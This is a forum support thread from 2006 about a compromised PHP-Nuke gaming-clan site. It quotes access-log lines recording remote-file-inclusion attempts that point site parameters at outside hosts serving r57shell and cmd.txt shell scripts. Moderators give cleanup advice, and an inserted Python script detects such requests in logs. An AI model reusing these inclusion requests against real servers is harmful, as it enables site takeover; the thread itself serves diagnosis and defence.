| Author |
Message |
ivellios New Member


Joined: Dec 02, 2006 Posts: 2
|
Posted:
Thu Dec 07, 2006 11:33 am |
|
Hi Guys!
I have been having some issues with my site lately, KZNClan.com. We are a BF2 gaming clan and love your distro.
I am running the latest distro of raven, but I added vwar hiwire from phpnuke-clan. So far I am thinking that that is the problem. We continually get a 400 error message whenever we are leaving the homepage.
First, what is the best way to stop this from happening? Will it help to ban by country as I have seen suggested here?
Second, how can I fix this? I can manipulate the code after I figure out what I am looking for, but I am definitely not a script writer. So it usually takes me a few tries to figure out what the script I manipulate is doing. That is my level of experience.
Right now I am thinking that it would be best to upload new copies of everything and then transfer the site to that directory. Will this work?
Lastly, I have to do something quick before 1and1 shuts me down. While we have been busy these last 2 months, we love your product and feel badly about waiting so long to donate. If you can find the time to help me in this problem I will make sure to rectify this oversight and then some.
Here is a part of the e-mail from my host:
access.log.current:201.78.123.141 - - [07/Dec/2006:06:18:54 -0500] "GET
/modules.php?name=News&file=http://schralprider.com/cp/agatsuma/CMD/
r57shell.txt? HTTP/1.1" 200 71 s180249571.onlinehome.us "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; pt-BR) Opera 8.54" "-"
access.log.current:72.232.53.210 - - [28/Nov/2006:13:30:24 -0500]
"GET/modules/vwar/admin/admin.php?vwar_root=http://fuxed.by.ru/cmd.txt?H
TTP/1.1" 200 609 "-""libwww-perl/5.805" "-"
If there is any more info you need please let me know. |
|
|
|
 |
fkelly Moderator

Joined: Aug 30, 2005 Posts: 2063 Location: near Albany NY
|
Posted:
Thu Dec 07, 2006 1:10 pm |
|
It appears from what you've posted that hackers may have used a hole in your system, perhaps one associated with vwar, to stick a shell script on your system. That's what the r57shell.txt thing is if I'm not mistaken. You might want to use your host's file manager via Vdeck or Cpanel or whatever you have to look thru all the directories and try to locate this and any similar files. Then get rid of them and any modules you've added.
Then, yes you can reload your distribution but it's not going to do any good to do this if you still have programs with security holes there. The hackers will still find them and exploit them. |
|
|
|
 |
evaders99 Moderator

Joined: Apr 30, 2004 Posts: 2758
|
Posted:
Thu Dec 07, 2006 1:21 pm |
|
"We continually get a 400 error message whenever we are leaving the homepage."
Hmm, what page is it going to? That generally doesn't indicate a hacker.
However, the logs provided do indicate a hack attempt. I'm not surprised if it was vWar that was attacked. It is possible your site may be compromised; your host will need to look at all processes on the server to see if any are malicious. I've seen a lot of bot scripts that will hide as innocent system processes like bash or ls. |
|
|
|
 |
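A way to pull requests like the two in the host's excerpt out of an access log, added here as an example (not code posted in this thread): it flags any request whose query-string value is itself an http/https/ftp URL, and keeps the status code, which only shows that the server answered, not that the remote file was actually included. The sample lines, IP addresses and the `remote.example` host are constructed, and the log layout is assumed to be Apache's common/combined format.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request part of an Apache access-log line. search() is used so a
# "filename:" prefix left by grep (as in the host's e-mail) is tolerated.
LINE_RE = re.compile(
    r'(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)
# A parameter value that begins with a URL scheme is the remote-include pattern.
REMOTE_VALUE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, placeholder host).
SAMPLE = [
    'access.log.current:203.0.113.7 - - [07/Dec/2006:06:18:54 -0500] "GET /modules.php?name=News&file=http://remote.example/shell.txt? HTTP/1.1" 200 71 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [28/Nov/2006:13:30:24 -0500] "GET /modules/vwar/admin/admin.php?vwar_root=http%3A%2F%2Fremote.example/cmd.txt? HTTP/1.1" 200 609 "-" "libwww-perl/5.805"',
    '192.0.2.44 - - [07/Dec/2006:06:20:01 -0500] "GET /modules.php?name=News&file=article&sid=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [07/Dec/2006:06:21:10 -0500] "GET /index.php HTTP/1.1" 400 312 "-" "Mozilla/5.0"',
]

def find_rfi_probes(lines):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue  # not an access-log request line
        parts = urlsplit(m['target'])
        # parse_qsl percent-decodes once; unquote() again catches double encoding.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_VALUE.match(unquote(value)):
                findings.append({
                    'ip': m['ip'], 'time': m['ts'], 'status': int(m['status']),
                    'path': parts.path, 'param': name, 'remote': value,
                })
    return findings

if __name__ == '__main__':
    for f in find_rfi_probes(SAMPLE):
        print(f"{f['time']} {f['ip']} {f['path']} "
              f"{f['param']}={f['remote']} -> HTTP {f['status']}")
```

The script and parameter names it reports (here `modules.php`/`file` and `admin.php`/`vwar_root`) show which code to review or remove, and the timestamps give a starting point when looking for files dropped on the server.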
ivellios New Member


Joined: Dec 02, 2006 Posts: 2
|
Posted:
Fri Dec 08, 2006 12:01 am |
|
Well if you go to our site and try to go anywhere but the homepage it will show you.
I can go to the admin file though. |
|
|
|
 |
evaders99 Moderator

Joined: Apr 30, 2004 Posts: 2758
|
Posted:
Fri Dec 08, 2006 9:26 am |
|
| Code: |
INTERNAL SERVER ERROR
An internal server error has occured!
|
This is where you will need to go to your server's error logs or ask your host. |
|
|
|
 |
gregexp The Mouse Is Extension Of Arm

Joined: Feb 21, 2006 Posts: 1465 Location: In front of a screen....HELP! lol
|
Posted:
Fri Dec 08, 2006 5:41 pm |
|
Hmm, is there anything writing to .htaccess?
Most of the time I personally have seen this error, it has been due to the .htaccess having something written in it that Apache conflicts with.
All previously mentioned advice will lead you to this if it is the case, but thought I would drop it in just in case you're finding it difficult. |
|
|
 |
 |